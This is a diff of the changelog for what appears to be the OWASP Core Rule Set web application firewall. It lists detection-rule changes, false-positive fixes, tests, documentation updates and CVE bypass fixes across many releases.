+ * fix: avoid FP in SQL function names by splitting between PL1/PL2 (942151 PL1, 942150 PL2) (Jozef Sudolský) [#2480]
+ * feat: extend rule to detect `sql_compileoption_get` in SQLite injection attacks (942152 PL1) (Andrew Howe) [#2718]
+ * fix: extend blind SQLi detection (942160 PL1) (Franziska Bühler, Christian Folini) [#1956]
+ * feat: new regex-assembly file for rule (942170 PL1) (Andrea Menin) [#2939]
+ * feat: extend rule to detect SQL injection authentication bypasses (942180 PL2) (rekter0) [#2575]
+ * feat: improve SQLi detection with spaces (942190 PL1, 942390 PL2) (Manuel Spartan, Max Leske) [#2436]
+ * fix: avoid FP in SQLi by adding word boundary checks (942190 PL1) (Jozef Sudolský) [#2078]
+ * fix: avoid FP in SQLi with keyword 'union' (942190 PL1) (Franziska Bühler) [#2058]
+ * fix: prevent comment-based SQL evasion (942190 PL1) (Andrea Menin) [#1910]
+ * fix: resolve bug in regular expression and add test case (942190 PL1) (NiceYouKnow, Max Leske, Franziska Bühler) [#2112]
+ * feat: disassemble complex regex (942200 PL2) (Franziska Bühler, Max Leske) [#2932]
+ * feat: extend rule to detect SQLi in user-agent and referer request headers (942200 PL2, 942370 PL2) (Franziska Bühler, Shivam Bathla) [#3106]
+ * feat: improve regex-assembly file for rule (942210 PL2) (Andrew Howe) [#2945]
+ * fix: detect the correct magic numbers that crash old PHP versions (942220 PL1) (Kyzentun, Walter Hop) [#2010]
+ * fix: avoid false positive with 'case' (942230 PL1) (Franziska Bühler) [#2035]
+ * fix: detect SQL false negative (942230 PL1) (Max Leske) [#2348]
+ * feat: disassemble complex regex (942240 PL1) (Franziska Bühler, Max Leske) [#2938]
+ * fix: avoid FP 
in 'having' SQLi (942251 PL3) (Felipe Zipitría) [#2248]
+ * feat: new regex-assembly file for rule (942280 PL1) (Andrea Menin) [#2933]
+ * feat: extend rule to detect additional MongoDB operators via NoSQL commands list (942290 PL1) (rekter0) [#2579]
+ * feat: new regex-assembly file for rule (942290 PL1) (Andrea Menin) [#2942]
+ * feat: improve regex-assembly format (942300 PL2) (Felipe Zipitría) [#3296]
+ * fix: avoid false positive by adding word boundary checks (942300 PL2) (Franziska Bühler) [#2099]
+ * fix: remove unnecessary part of regular expression (942310 PL2) (NiceYouKnow) [#2189]
+ * feat: extend rule to detect `::int` and `::bool` SQL data conversions (942320 PL1) (Franziska Bühler) [#2872]
+ * feat: extend rule to detect `lo_get` and `::text` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Walter Hop, Shivam Bathla) [#2925]
+ * feat: extend rule to detect `lo_import` and `div` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Shivam Bathla) [#2916]
+ * feat: extend rule to detect more PostgreSQL data types (942320 PL2) (Franziska Bühler, Shivam Bathla) [#3019]
+ * fix: add word boundaries to keywords to solve false positives (942330 PL2) (Franziska Bühler) [#3207]
+ * feat: extend rule to detect SQL injection better (942340 PL2) (Karel Knibbe) [#2557]
+ * fix: extend rule to detect more SQLi (942340 PL2) (Jan Gora / terjanq) [#2559]
+ * feat: detect SQLi using the 'drop' keyword (942350 PL1, 942360 PL1, 942200 PL2, 942362 PL2) (Jozef Sudolský) [#2218]
+ * fix: solve ReDoS issue in rule (942350 PL1) (Andrea Menin) [#2300]
+ * feat: new regex-assembly file for rule (942370 PL2) (Christoph Hansen, Max Leske) [#2954]
+ * feat: detect SQLi with 'if exists' (942380 PL2) (NiceYouKnow) [#2121]
+ * feat: optimize regex (942400 PL2) (Jozef Sudolský) [#2323]
+ * feat: disassemble complex chained regex (942440 PL2) (Felipe Zipitría) [#3295]
+ * feat: optimize regex (942440 PL2) (Felipe Zipitría) [#2459]
+ * fix: adapt rule to work in 
all ModSecurity versions (942440 PL2) (Andrew Howe) [#2201]
+ * fix: avoid FP in JWT tokens (942440 PL2) (Andrea Menin) [#2460]
+ * fix: reformat rules to follow project guidelines (942440 PL2, 949959, 949159, 959059, 959159) (Ervin Hegedus) [#3206]
+ * fix: solve errors in regex pattern (942440 PL2) (Andrea Menin) [#3290]
+ * fix: prevent FPs for click identifiers in query string by placing arg specific rule exclusions in rule set (942441, 942442) (Max Leske) [#3500]
+ * feat: extend rules to detect `current_user` and `overlay` (942470 PL1, 942480 PL2) (Franziska Bühler) [#2875]
+ * feat: extended rule to detect detect SQL injection attacks using headers (942480 PL2) (Paul Beckett) [#2911]
+ * feat: extend rule to detect newlines in overlay (942480 PL2) (Franziska Bühler, Shivam Bathla) [#3040]
+ * fix: detect MySQL optimizer hints (942500 PL1) (Max Leske) [#3431]
+ * feat: new rules to detect SQL authentication bypasses (942520 PL2, 942521 PL2, 942522 PL2) (Jan Gora / terjanq) [#2603]
+ * feat: extend rule to detect SQLi in user-agent and referer request headers (942521 PL2) (Franziska Bühler, Shivam Bathla) [#3107]
+ * fix: replace 'MATCHED_VAR' in 'logdata' argument with stable variable (942521 PL2, 943110 PL1, 943120 PL1) (Ervin Hegedus) [#3543]
+ * feat: new rule to detect `';` in SQLi (942530 PL3) (Franziska Bühler) [#2808]
+ * feat: new rule to detect authentication bypass via SQL injection that abuses semi-colons to end the SQL query (942540 PL1) (Karel Knibbe) [#2904]
+ * fix: update scoring variable (942540 PL2) (Walter Hop) [#2970]
+ * feat: new rule to detect MySQL scientific notation attacks (942560 PL1) (Jitendra Patro) [#3316]
+ * fix: remove unnessecary 'lowercase' transformation from chain rule (944120 PL1) (Federico G. 
Schwindt) [#1852]
+ * feat: extend rule to detect JAVA exploits better via java-classes.data file (944130 PL1) (Dennis Brown) [#3048]
+ * feat: new rule to deny uploading .jsp and .jspx files (944140 PL1) (Walter Hop) [#2456]
+ * feat: new rule to detect Spring4Shell (944260 PL2) (Christian Folini, Andrea Menin) [#2464]
+ * fix: update administrative rule ids for consistent operation (950011, 950012, 950018) (Ervin Hegedus) [#3339]
+ * feat: improve rule file 951xxx via the use of `skipAfter` instead of variable `TX:sql_error_match` (Jozef Sudolský) [#2754]
+ * feat: extend data file to include additional SQL error messages (sql-errors.data, 951100 PL1) (Jitendra Patro) [#3214]
+ * fix: avoid FP in MySQL data leakage rule (951230 PL1) (Jozef Sudolský) [#2490]
+ * fix: avoid FP in PostgreSQL error messages (951240 PL1) (Jozef Sudolský, Franziska Bühler) [#1870, #2313]
+ * fix: handle false positive in SQL error leakage detection (951240 PL1) (Jozef Sudolský) [#3169]
+ * fix: avoid FP in Sybase error message (951260 PL1) (Jozef Sudolský) [#2307]
+ * feat: extend rule to detect PHP errors better via new automation (953100 PL1) (Felipe Zipitría) [#2663]
+ * feat: new rules to detect PHP error leakages with high false positive rates at paranoia level 2 instead of 1 (953100 PL1, 953101 PL2) (Andrea Menin) [#3119]
+ * fix: solve false positive by shifting "Field cannot be empty" to PL2 (953100 PL1, 953101 PL2) (Esad Cetiner) [#3407]
+ * fix: ignore case of `PHP` tag in response text (953210 PL1) (Felipe Zipitría) [#2664]
+ * feat: extend rule to detect IIS errors via automation of pattern updates (954120 PL1) (Felipe Zipitría) [#2810]
+ * fix: log response body to audit log only when full rule chain matches (954130 PL1) (Franziska Bühler) [#2202]
+ * feat: added new webshells and tests (955100 PL1) (Jozef Sudolský) [#3405]
+ * feat: extend data file to include additional web shells (web-shells-php.data, 955100 PL1) (Jitendra Patro) [#3215]
+ * feat: extend data file to 
include additional web shells (web-shells-php.data, 955100 PL1) (Jozef Sudolský) [#2687]
+ * fix: make regular expression more strict to reduce noise in logs (955120 PL1) (Jozef Sudolský) [#2315]
+ * fix: use correct variable in chained condition for correlation rules (980120 PL0, 980150 PL0) (Simon Studer) [#1898]
+
+Changes without direct rule impact:
+ * chore: improve changelog-pr workflow (Max Leske) [#3416]
+ * chore: generate changelog entries with leading space (Max Leske) [#3550]
+ * chore: move regexp-assembly to separate directory (Felipe Zipitría) [#2327]
+ * chore: parse changelog PR author names from contributors (Max Leske) [#3408]
+ * docs: add a note to a commented rule about unsupported action in v3 (Ervin Hegedus) [#2098]
+ * docs: add documentation on blocking of archive file extensions that are not blocked by default (Andrew Howe) [#2758]
+ * docs: add example exclusion rule for monitoring agents (Andrea Menin) [#2037]
+ * docs: add file sponsors.md (Christian Folini) [#2174]
+ * docs: add link to run tests (Ervin Hegedus) [#3438]
+ * docs: add link to slack invitation to README (Christian Folini) [#2122]
+ * docs: add missing PL tags to all rules (Ervin Hegedus) [#1882]
+ * docs: add note of lack of rule range support in ModSecv3 (Andrew Howe) [#3303]
+ * docs: add to CONTRIBUTING.MD chain rule commenting guidance (Ervin Hegedus) [#3196]
+ * docs: align actions in right order (Ervin Hegedus) [#2237]
+ * docs: bring CONTRIBUTING.MD in line with documentation (Andrew Howe) [#2558]
+ * docs: change documentation git module link to https (İlteriş Eroğlu) [#2461]
+ * docs: change-version: fix typo (Deepshikha Sinha) [#2430]
+ * docs: contributing.md: add more information for new developers (Andrew Howe) [#2487]
+ * docs: crs-setup.conf: add note to allowed_request_content_type settings (Ervin Hegedus) [#2164]
+ * docs: enhance installation process for Nginx / IIS (Jozef Sudolský) [#1988]
+ * docs: explained to leave audit log settings alone in 
CONTRIBUTING.md (Christian Folini) [#3090] + * docs: fix capec id for crawlers (Jozef Sudolský) [#2258] + * docs: fix changed Trustwave URLs (Elia Pinto, henkworks, Felipe Zipitría) [#2213, #2364, #2204] + * docs: fix docs for Apache (Jozef Sudolský) [#2238] + * docs: fix donate URL (Felipe Zipitría) [#2132] + * docs: fixed minor typo in comment in file rules/restricted-files.data (Homesteady) [#3305] + * docs: fix NextCloud example comments (Joost de Keijzer) [#2282] + * docs: fix ruleid typos in comments (Paul Beckett) [#2263] + * docs: fix stricter sibling comment for SQL Injection () (Stephen Sigwart) [#1913] + * docs: fix typo in initialization(Elia Pinto) [#2366] + * docs: fix typo in sampling mode description (Christian Folini) [#2090] + * docs: fix typos across the entire project as reported by codespell (Ervin Hegedus) [#2519] + * docs: fix typos in README (Priyam Patel) [#2494] + * docs: improve changelog organization (Christian Folini) [#3536] + * docs: missing space after comment mark (Ervin Hegedus) [#2097] + * docs: update OWASP Slack URL (Jozef Sudolský) [#2056] + * docs: remove 'log' from rules and let SecDefaultAction decide what to do (Federico G. 
Schwindt) [#1876] + * docs: replace terms Blacklist and Whitelist with Deny list and Allow list (Paul Beckett) [#2137] + * docs: reword comment (900300 config) (Christian Folini) [#3417] + * docs: reword contributing.md (Christian Folini) [#2077] + * docs: sync CONTRIBUTING.MD with HTML version (Andrew Howe) [#3301] + * docs: transferred CHANGES to CHANGES.md (Felipe Zipitría) [#2606] + * docs: update and tidy CHANGES.md file for v4.0 release (Andrew Howe, Max Leske) [#3540] + * docs: update CONTRIBUTORS.md for new release (Ervin Hegedus) [#3340] + * docs: update description of rule 920350 (Christian Folini) [#1952] + * docs: update documentation hyperlinks on rules (Dexter Chang) [#3232] + * docs: update links and format of known bugs (Felipe Zipitría) [#2186] + * docs: update OWASP vulnerability URLs (Walter Hop) [#2467] + * docs: update policy to include signed releases (Felipe Zipitría) [#2465] + * docs: update README for Nginx (vijayasija99) [#2158] + * docs: update SPONSORS.md for new release (Christian Folini) [#3341] + * docs: remove sponsor F5 / VMWare (Christian Folini) [#3555] + * feat: add consistent rule references to initialization rule comments (Andrew Howe) [#2813] + * feat: add editorconfig file to keep spacing in good shape (Felipe Zipitría) [#2407] + * feat: add timezone variable to docker-compose (Felipe Zipitría) [#1995] + * fix: indentations (Ervin Hegedus) [#1851] + * fix: link for docs/OWASP-CRS-Documentation submodule (Ervin Hegedus) [#1885] + * fix: multiple fixes when generating changelog PR (Max Leske) [#3418], [#3420], [#3422], [#3424] [#3429] + * fix: nginx logging in docker-compose (Felipe Zipitría) [#2036] + * fix: remove all whitespace at EOL (Felipe Zipitría) [#2405, #2406] + * fix: remove full stop from end of log message (920181 PL1) (Federico G. 
Schwindt) [#2011] + * fix: yamllint (Felipe Zipitría) [#2387] + * tests: add a Chrome and Firefox version 100 UA (Mike Taylor) [#2325] + * tests: add common and uniform http headers to tests (Felipe Zipitría) [#2362] + * tests: additional tests for use in PHP wrappers in PHP injection attacks (rule 933200 PL1) (Andrew Howe) [#2723] + * tests: add positive test 920100-16 for rule 920100 PL1 (Andrew Howe) [#2952] + * tests: add positive test 920190-3 for rule 920190 PL1 (Andrew Howe) [#2956] + * tests: add positive test 920250-4 for rule 920250 PL1 (Andrew Howe) [#2971] + * tests: add positive test 920340-3 for rule 920340 PL1 (Andrew Howe) [#2972] + * tests: add positive test 920470-18 for rule 920470 PL1 (Andrew Howe) [#3058] + * tests: add positive test 921120-4 for rule 921120 PL1 (Andrew Howe) [#3083] + * tests: add positive test 921150-2 for rule 921150 PL1 (Andrew Howe) [#3158] + * tests: add positive test 932160-8 for rule 932160 PL1 (Christian Folini) [#2997] + * tests: add test against FP when using urlDecode for 932140 (Max Leske) [#2191] + * tests: add test for rule 941130 PL1 (Paul Beckett) [#2923] + * tests: add test for rule 941140 PL1 (Franziska Bühler) [#2995] + * tests: add test for rule 941170 PL1 (Franziska Bühler) [#2994] + * tests: add test for rule 941200 PL1 (Franziska Bühler) [#2993] + * tests: add test for rule 941240 PL1 (Franziska Bühler) [#2975] + * tests: add test for rule 941310 PL1 (Franziska Bühler) [#2974] + * tests: add test for rule 941400 PL1 (Franziska Bühler) [#2969] + * tests: add test for rule 942170 PL1 (Franziska Bühler) [#2968] + * tests: add test for rule 942270 PL1 (Franziska Bühler) [#2967] + * tests: add test for rule 942350 PL1 (Franziska Bühler) [#2965] + * tests: add test for rule 942500 PL1 (Franziska Bühler) [#2964] + * tests: add test for rule 942520 PL2 (Franziska Bühler) [#2706] + * tests: add test for rule 943100 PL1 (Franziska Bühler) [#2962] + * tests: add test for `sql_compileoption_used` detection (rule 
942151 PL1) (Andrew Howe) [#2714] + * tests: add tests for 920120 (Max Leske) [#2369] + * tests: add tests for 920121, 932150, 932160, 932120, 932130, 921151 (Paul Beckett) [#2264, #2275, #2276, #2272, #2273, #2270] + * tests: add tests for 920275, 913101, 913102, 920410, 920171, 932190, 932110, 932105 (Ervin Hegedus) [#2021, #2253, #2257, #2294, #2295, #2285, #2286, #2287] + * tests: add tests for 920341 (Juan-Pablo Tosso) [#2266] + * tests: add tests for 921180 (Juan-Pablo Tosso, Christian Folini) [#2308] + * tests: add tests for 932170, 932171, 932106, 932180, 942170, 942251, 942460 (Franziska Bühler) [#2252, #2254, #2255, #2280, #2283, #2284, #2269, #2268] + * tests: add tests for 933111, 933190, 933200 (NiceYouKnow) [#2281] + * tests: add tests for FP 921110 request smuggling (Franziska Bühler) [#2102] + * tests: add tests for rules 942521 and 942522 PL2 (Franziska Bühler) [#2708] + * tests: add test to prove we cover complex shell variables usage in rule 932230 (Felipe Zipitría) [#2966] + * tests: clean up quoting (Max Leske) [#2370] + * tests: deprecate ftw in favor of go-ftw (Felipe Zipitría) [#3076] + * tests: detection of \*nix RCE using multiple variable assignments (932200 PL2) (Christian Folini) [#2899] + * tests: enable UTF8 encoding validation (Felipe Zipitría) [#2992] + * tests: extend coverage for rule 932120 (Felipe Zipitría) [#2996] + * tests: extend coverage for rule 932200 (Felipe Zipitría) [#2950] + * tests: extend coverage for rule 932220 (Felipe Zipitría) [#3063] + * tests: fix 933160-21 and 942500-1 due to invalid URI (Takaya Saeki) [#2168] + * tests: fix duplicated tests for rule 934130 PL1 (Walter Hop) [#2918] + * tests: fixed end boundary in 932180-2 (Ervin Hegedus) [#2377] + * tests: fixed URLs tests for rule 932130 PL1 (Matteo Pace) [#2880] + * tests: fixed URLs tests for rules 934130 PL1 and 934131 PL2 (Matteo Pace) [#3133] + * tests: fix logging problem for Nginx (vijayasija99) [#2157] + * tests: fix Python version for tests (Max 
Leske) [#2247] + * tests: fix requirements version (nobletrout) [#2004] + * tests: fix tests lacking charset (Felipe Zipitría) [#1932] + * tests: fix tests on rule 932200 to detect FPs (Max Leske) [#3309] + * tests: fix test titles (bxlxx.wu, Ervin Hegedus) [#2504, #2497] + * tests: fix test using old syntax and add go-ftw check (Felipe Zipitría) [#2715] + * tests: improve test setup, rewrite of log checker (Max Leske) [#2363] + * tests: increase tests (920280-3, 920430-3, 920430-9) compatibility with other proxies (Matteo Pace) [#3134] + * tests: normalized keys in test files (Ervin Hegedus) [#2493] + * tests: rearranged tests for rule 920340 (Christian Folini) [#3089] + * tests: rearranged tests for rule 920400 PL1 (Matteo Pace) [#2877] + * tests: remove Accept-Charset from test files (Felipe Zipitría) [#2781] + * tests: remove broken test 932100-3 (Felipe Zipitría) [#2165] + * tests: use only valid YAML (Felipe Zipitría) [#2080] + * tests: use same user-agent (Felipe Zipitría) [#2393] + +Functionality that has been moved to plugins for this release: + * feat: add Google OAuth 2 exclusion plugin (Jozef Sudolský) [#2388] + * feat: add phpBB exclusion rules (now a plugin) (Jozef Sudolský) [#1893] + * feat: add phpMyAdmin exclusion rules (now a plugin) (Jozef Sudolský) [#1951] + * feat: move IP reputation rules to plugins (Simon Studer) [#2482] + * feat: move exclusion profiles and DOS rules to plugins (Andrew Howe) [#2469] + * feat: ownCloud: Fix rule 9003001 to match both DAV and WebDAV (now a plugin) (Abu Dawud) [#2130] + * fix: nextcloud: fix FPs (now a plugin) (kam821, Jozef Sudolský, ntimo, Felipe Zipitría, pyllyukko) [#1840, #1843, #1847, #1946] + * fix: phpBB: Fix FPs (now a plugin) (Jozef Sudolský) [#2057, #2180, #2299, #2343] + * fix: phpMyAdmin: Fix FPs (now a plugin) (Jozef Sudolský) [#2172, #2249, #2321, #2351] + * fix: replace ARGS by ARGS_GET in rules in phase:1 (various rule exclusion rules) (Ervin Hegedus) [#2063] + * fix: wordPress: fix FPs (now a 
plugin) (Jozef Sudolský) [#1899, #1971, #2320] + * fix: wordPress: fix FPs and improve performance (now a plugin) (Walter Hop) [#1997, #2311] + * fix: wordPress: fix FPs in Site Health page (now a plugin) (Robert de Boer, Fregf, Walter Hop) [#1895, #1920] + * fix: xenForo: fix FPs (now a plugin) (Walter Hop, ThanhPT) [#1844, #1865, #1894, #1998, #2421] + +## Version 3.3.5 - 2023-07-18 + +Important changes: + +* Backport fix for CVE-2023-38199 from CRS v4 via new rule 920620 (Andrea Menin, Felipe Zipitría) + +Fixes: + +* Fix paranoia level-related scoring issue in rule 921422 (Walter Hop) +* Move auditLogParts actions to the end of chained rules where used (Ervin Hegedus) + +Chore: + +* Clean up redundant paranoia level tags (Ervin Hegedus) +* Clean up YAML test files to support go-ftw testing framework (Felipe Zipitría) +* Move testing framework from ftw to go-ftw (Felipe Zipitría) + +## Version 3.3.4 - 2022-09-20 + +Fixes and improvements: + +* Fix a regression in our former release, with the impact that some Paranoia Level 2 rules would activate even when running in Paranoia Level 1. (Simon Studer, Walter Hop) + +## Version 3.3.3 - 2022-09-19 + +Important changes: + +* This update requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports of the security fixes in these versions) or a compatible engine supporting these changes. If you do not upgrade ModSecurity, the file REQUEST-922-MULTIPART-ATTACK.conf will cause ModSecurity to fail to start. In that case, you can temporarily delete that file. However, you will be missing protection from these rules. Therefore, we recommend upgrading your ModSecurity or other engine instead. +* By default, the request headers "Accept-Charset" and "Content-Encoding" are now blocked to prevent a WAF bypass. Especially the "Accept-Charset" header may be in use by clients. If you need to serve clients that send this header, uncomment and edit rule 900250 in crs-setup.conf. 
+ +Fixes and improvements: + +* Fix CVE-2022-39955 Multiple charsets defined in Content-Type header (Jan Gora) +* Fix CVE-2022-39956 Content-Type or Content-Transfer-Encoding MIME header fields abuse (Jan Gora, Felipe Zipitria) +* Fix CVE-2022-39957 Charset accept header field resulting in response rule set bypass (Karel Knibbe, Max Leske) +* Fix CVE-2022-39958 Small range header leading to response rule set bypass (Hussein Daher, Christian Folini) +* Fix MIME header abuse via _charset_ field (Jan Gora, Felipe Zipitria) +* Fix bypass using deflated request body (Karel Knibbe) +* Fix request body partial rule set bypass via Content-Type "text/plain" (Pinaki Mondal, Andrea Menin) +* Fix XML Body Parser abuse for non-XML request bodies (Jan Gora) +* Fix body processor bypass by content-type outside the mime type declaration (Jan Gora, Simon Studer, Ervin Hegedus) + +## Version 3.3.2 - 2021-06-30 + +Fixes and improvements: + * Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini) + +## Version 3.3.0 - 2020-07-01 Important changes: * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use. @@ -43,7 +598,7 @@ Fixes and improvements: * Fix GHA badges (Federico G. Schwindt) * feat(badge): add apache license badge * fix typos found by fossies codespell (Tim Herren) - * Decrease processing time of rules (Ervin Hegedüs) + * Decrease processing time of rules (Ervin Hegedus) * handle multiple directives in 920510 (Andrea Menin) * handle multiple directives in 920510 (Andrea Menin) * fix(ci): use log_contains instead (Felipe Zipitria) 
@@ -60,7 +615,7 @@ Fixes and improvements: * Remove outdated Travis status after migration (Christian Folini) * feat(ci): adds github actions testing (Felipe Zipitria) * fix(migration): post migration tasks (Felipe Zipitria) - * feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) + * feat(templates): add text to github templates about migration. To be reverted after migration is done. (Felipe Zipitria) * Added more explanations to comment of 920300 (Christian Folini) * Added 'ver' action with current version to all necessary rules (Ervin Hegedus) * Update nextcloud excl rules and shorten var (Franziska Bühler) @@ -86,7 +641,7 @@ Fixes and improvements: * Fix FPs for 942350 (#1706) (Franziska Bühler) * Fix typos found by codespell / Fossies project (#1702) (Simon Studer) * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) - * Narrowing down the subpattern .*? in 941130 (Christian Folini) + * Narrowing down the subpattern .\*? in 941130 (Christian Folini) * Restricting a wide regex a bit (Christian Folini) * Drop escapes (Christian Folini) * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) 
@@ -165,14 +720,14 @@ Fixes and improvements: * Fix typo and add 2 new entries to 941160 (Franziska Bühler) * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) - * Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) + * Rearrange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) * Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) * fix rule regex due to remove t:removeComments (Andrea Menin) * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) * update Dockerfiles and Travis to use v3.3/dev (Walter Hop) -== Version 3.2.0 - 2019-09-24 == +## Version 3.2.0 - 2019-09-24 New functionality: * Add AngularJS client side template injection 941380 PL2 (Franziska Bühler) 
@@ -271,7 +826,7 @@ Fixes and improvements: * INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop) * Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan) * Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen) - * Mark patterns not supported by re2 (Federico G. Schwindt) + * Mark patterns not supported by RE2 (Federico G. Schwindt) * Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt) * Move PROXYLOCATION var (Franziska Bühler) * PHP: move get_defined_functions() and friends into PL1 (Walter Hop) @@ -339,7 +894,7 @@ Documentation: * Update README.md (Rufus125) * Updating crs site location (Chaim Sanders) -== Version 3.1.1 - 2019-06-26 == +## Version 3.1.1 - 2019-06-26 * Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt) * Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt) @@ -349,7 +904,7 @@ Documentation: * Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt) * Fix bug in 943120 (XeroChen) -== Version 3.1.0 - 2018-08-07 == +## Version 3.1.0 - 2018-08-07 * Add Detectify scanner (Andrea Menin) * Renaming matched_var/s (Victor Hora) @@ -375,7 +930,7 @@ Documentation: * Fix bypass caused by multiple spaces in RCE rules (Walter Hop) * Remove unneeded regex capture groups (Federico G. Schwindt) * Add built-in exceptions for CPanel (Christoph Hansen) - * Add additional file restrictios for ws_ftp, DS_Store... (Jose Nazario) + * Add additional file restrictions for ws_ftp, DS_Store... (Jose Nazario) * Fix missing strings in 942410 (Franziska Bühler) * Add 2 missing PDO errors (Christoph Hansen) * Fix issues with FPs in regression tests (Chaim Sanders) 
@@ -452,12 +1007,12 @@ Documentation: * Removed deprecated t:removeComments from 942100 (Christian Folini) * Add word boundary to rule 942410 (Franziska Bühler) -== Version 3.0.2 - 2017-05-12 == +## Version 3.0.2 - 2017-05-12 * Remove debug rule that popped up in 3.0.1 (Christian Folini) -== Version 3.0.1 - 2017-05-09 == +## Version 3.0.1 - 2017-05-09 * SECURITY: Removed insecure handling of X-Forwarded-For header; reported by Christoph Hansen (Walter Hop) @@ -494,7 +1049,7 @@ Documentation: * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) -== Version 3.0.0 - 2016-11-10 == +## Version 3.0.0 - 2016-11-10 Huge changeset running in separate branch from September 2013 to September 2016. This is a cursory summary of the most important changes: @@ -567,7 +1122,7 @@ This is a cursory summary of the most important changes: * Many improvements to rules in 2014/5 (Ryan Barnett) -== Version 2.2.9 - 2013-09-30 == +## Version 2.2.9 - 2013-09-30 Improvements: * Updated the /util directory structure @@ -579,10 +1134,10 @@ Bug Fixes: https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/157 -== Version 2.2.8 - 2013-06-30 == +## Version 2.2.8 - 2013-06-30 Improvements: -* Updatd the /util directory structure +* Updated the /util directory structure * Added scripts to check Rule ID duplicates * Added script to remove v2.7 actions so older ModSecurity rules will work - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/43 @@ -608,7 +1163,7 @@ Bug Fixes: - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/18 -== Version 2.2.7 - 2012-12-19 == +## Version 2.2.7 - 2012-12-19 Improvements: * Added JS Overrides file to identify successful XSS probes @@ -623,7 +1178,7 @@ Bug Fixes: * Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable -== Version 2.2.6 - 2012-09-14 == +## Version 2.2.6 - 2012-09-14 Improvements: * Started rule formatting update for better readability 
@@ -644,7 +1199,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-78 -== Version 2.2.5 - 2012-06-14 == +## Version 2.2.5 - 2012-06-14 Security Fixes: * Updated the anomaly scoring value for rule ID 960000 to critical @@ -668,7 +1223,7 @@ Bug Fixes: * Added forceRequestBodyVariable action to rule ID 960904 -== Version 2.2.4 - 2012-03-14 == +## Version 2.2.4 - 2012-03-14 Improvements: * Added Location and Set-Cookie checks to Response Splitting rule ID 950910 @@ -681,10 +1236,10 @@ Improvements: Bug Fixes: * Fixed missing comma before severity action in rules 958291, 958230 and 958231 -* Fixed duplidate rule IDs +* Fixed duplicate rule IDs -== Version 2.2.3 - 2011-12-19 == +## Version 2.2.3 - 2011-12-19 Improvements: * Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file @@ -700,7 +1255,7 @@ Bug Fixes: * Updated the regex and added tags for RFI rules. -== Version 2.2.2 - 2011-09-28 == +## Version 2.2.2 - 2011-09-28 Improvements: @@ -719,7 +1274,7 @@ Bug Fixes: * Updated the SQLi regex for rule ID 981242 -== Version 2.2.1 - 2011-07-20 == +## Version 2.2.1 - 2011-07-20 Improvements: @@ -740,7 +1295,7 @@ Bug Fixes: * Updated rule ID 971150 signature to remove ; -== Version 2.2.0 - 2011-05-26 == +## Version 2.2.0 - 2011-05-26 Improvements: @@ -755,7 +1310,7 @@ Improvements: * Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) http://websecuritytool.codeplex.com/wikipage?title=Checks#charset * Added new AppSensor rules to experimental_dir - https://www.owasp.org/index.php/AppSensor_DetectionPoints + https://owasp.org/www-project-appsensor/ * Added new Generic Malicious JS checks in outbound content * Added experimental IP Forensic rules to gather Client hostname/whois info http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html 
@@ -790,7 +1345,7 @@ Bug Fixes: They will now inherit the settings from the SecDefaultAction -== Version 2.1.2 - 2011-02-17 == +## Version 2.1.2 - 2011-02-17 Improvements: @@ -804,7 +1359,7 @@ Bug Fixes: * Added missing " in the skipAfter SecAction in the CC Detection rule set -== Version 2.1.1 - 2010-12-30 == +## Version 2.1.1 - 2010-12-30 Bug Fixes: @@ -817,7 +1372,7 @@ Bug Fixes: * Moved the comment spam data file into the optional_rules directory -== Version 2.1.0 - 2010-12-29 == +## Version 2.1.0 - 2010-12-29 Improvements: @@ -848,7 +1403,7 @@ Improvements: -== Version 2.0.10 - 2010-11-29 == +## Version 2.0.10 - 2010-11-29 Improvements: @@ -862,7 +1417,7 @@ Bug Fixes: -== Version 2.0.9 - 2010-11-17 == +## Version 2.0.9 - 2010-11-17 Improvements: @@ -897,7 +1452,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-62 -== Version 2.0.8 - 2010-08-27 == +## Version 2.0.8 - 2010-08-27 Improvements: @@ -920,7 +1475,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-29 -== Version 2.0.7 - 2010-06-04 == +## Version 2.0.7 - 2010-06-04 Improvements: @@ -947,7 +1502,7 @@ Bug 